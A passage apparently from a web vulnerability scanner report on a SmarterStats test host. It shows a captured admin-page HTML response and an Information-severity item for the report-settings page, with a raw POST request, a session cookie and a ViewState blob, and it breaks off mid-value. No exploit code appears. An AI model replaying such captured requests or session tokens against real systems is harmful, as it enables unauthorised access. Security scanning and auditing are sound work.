                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                               </tr>
                           </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState" type="hidden" />
                       </div></div></td>
                   </tr>
               </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState" type="hidden" />
           </div></td><td class='RangeSeparator'>to</td><td><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline;zoom:1;width:110px;">
               <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2" type="text" class="rdfd_" value="2010-10-12-23-59-00" /><table cellspacing="0" class="rcTable" style="width:100%;">
                   <tr>
                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;"><input type="text" value="11:59 PM" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2$dateInput" type="text" class="rdfd_" value="2010-10-12-23-59-00" /><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timePopupLink" onclick="return CalendarPopup($find(&#39;ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2&#39;),&#39;time&#39;);"><img id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView">
                           <table id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools RadCalendarTimeView " cellspacing="0" border="0" style="width:250px;">
                               <tr>
                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                               </tr><tr>
                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                               </tr>
                           </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState" type="hidden" />
                       </div></div></td>
                   </tr>
               </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState" type="hidden" />
           </div></td></tr></table></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtReaderThreads">
           <td id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_Label" class="Indent Fixed">Import Threads</td><td id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtReaderThreads_SettingText" type="text" value="1" size="3" id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_lstBasePriority">
           <td id="ctl00_MPH_ImportingServerFields1_lstBasePriority_Label" class="Indent Fixed">Import Priority</td><td id="ctl00_MPH_ImportingServerFields1_lstBasePriority_Setting" class="Setting"><select name="ctl00$MPH$ImportingServerFields1$lstBasePriority_SettingDropDown" id="ctl00_MPH_ImportingServerFields1_lstBasePriority_SettingDropDown">
               <option value="idle">Idle</option>
               <option selected="selected" value="belownormal">Below Normal</option>
               <option value="normal">Normal</option>

           </select></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops">
           <td id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_Label" class="Indent Fixed">Import Frequency</td><td id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtIdleTimeBetweenLoops_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_SettingText" class="text" /> Minute(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice">
           <td id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_Label" class="Indent Fixed">Import Time per Site</td><td id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtReaderTimeSlice_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_SettingText" class="text" /> Minute(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep">
           <td id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_Label" class="Indent Fixed">Rows Before Sleep</td><td id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtRowsBeforeSleep_SettingText" type="text" value="500" size="3" id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime">
           <td id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_Label" class="Indent Fixed">Row Sleep Time</td><td id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtRowSleepTime_SettingText" type="text" value="1" size="3" id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_SettingText" class="text" /> Millisecond(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtDebugLevel">
           <td id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_Label" class="Indent Fixed">Debug Level</td><td id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtDebugLevel_SettingText" type="text" value="10" size="3" id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel">
           <td id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_Label" class="Indent Fixed">Compression Level</td><td id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_Setting" class="Setting"><select name="ctl00$MPH$ImportingServerFields1$lstCompressionLevel_SettingDropDown" id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_SettingDropDown">
               <option value="0">0 - No Compression (fastest)</option>
               <option selected="selected" value="1">1</option>
               <option value="2">2</option>
               <option value="3">3</option>
               <option value="4">4</option>
               <option value="5">5 (Default)</option>
               <option value="6">6</option>
               <option value="7">7</option>
               <option value="8">8</option>
               <option value="9">9 - Maximum Compression (slowest)</option>

           </select></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtMaxSessions">
           <td id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_Label" class="Indent Fixed">Max Sessions Per Site</td><td id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtMaxSessions_SettingText" type="text" value="100000" size="3" id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout">
           <td id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_Label" class="Indent Fixed">Session Timeout</td><td id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtSessionTimeout_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_SettingText" class="text" /> Minute(s)</td>
       </tr>
   </table>

       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/defaults/frmserverdefaults', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Server\x20Defaults'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"12:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_popupButton","_timePopupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timePopupLink","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState","focusedDate":"2010-10-12-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput","timeView":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView"}, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"11:59 PM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_popupButton","_timePopupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timePopupLink","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState","focusedDate":"2010-10-12-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput","timeView":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView"}, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2"));
});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
modules['vmNumberLess_txt']='Must be {0} or less';
$(function() {$vc({"lt":"Import Threads","vcID":"ctl00_MPH_ImportingServerFields1_txtReaderThreads_SettingText","VMs":["vmNumber","vmNumberGreater","vmNumberLess"],"VPs":{"vmRequired":true,"vmNumberGreater":1,"vmNumberLess":100}},false);});
$(function() {$vc({"lt":"Import Frequency","vcID":"ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Import Time per Site","vcID":"ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Rows Before Sleep","vcID":"ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Row Sleep Time","vcID":"ctl00_MPH_ImportingServerFields1_txtRowSleepTime_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":0}},false);});
$(function() {$vc({"lt":"Debug Level","vcID":"ctl00_MPH_ImportingServerFields1_txtDebugLevel_SettingText","VMs":["vmNumber"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Max Sessions Per Site","vcID":"ctl00_MPH_ImportingServerFields1_txtMaxSessions_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Session Timeout","vcID":"ctl00_MPH_ImportingServerFields1_txtSessionTimeout_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


11.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmReportSettings.aspx

Request

POST /Admin/frmReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10765

ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDefaultCustomReportDayRange_SettingText=62&ctl00%24MPH%24txtMaxDNSThreads_SettingText=100&ctl00%24MPH%24lstSendInterval_SettingDropDown=2&__VIEWSTATE=%2fwEPDwUJOTIwMTY0MDY0DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8DaGQCBw9kFgJmD2QWAgIBDxYCHwNoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgYCAg9kFgICAQ9kFgZmD2QWAgIBD2QWAgICDw8WAh8EBQI2MmRkAgEPZBYCAgEPZBYCAgIPDxYCHwQFAjYyZGQCAg9kFgICAQ9kFgICAg8PFgIfBAUCMTBkZAIED2QWAgIBD2QWBGYPZBYCAgEPZBYCAgIPDxYCHwQFAzEwMGRkAgEPZBYCAgEPZBYCZg8QZA8WZmYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8CEAIRAhICEwIUAhUCFgIXAhgCGQIaAhsCHAIdAh4CHwIgAiECIgIjAiQCJQImAicCKAIpAioCKwIsAi0CLgIvAjACMQIyAjMCNAI1AjYCNwI4AjkCOgI7AjwCPQI%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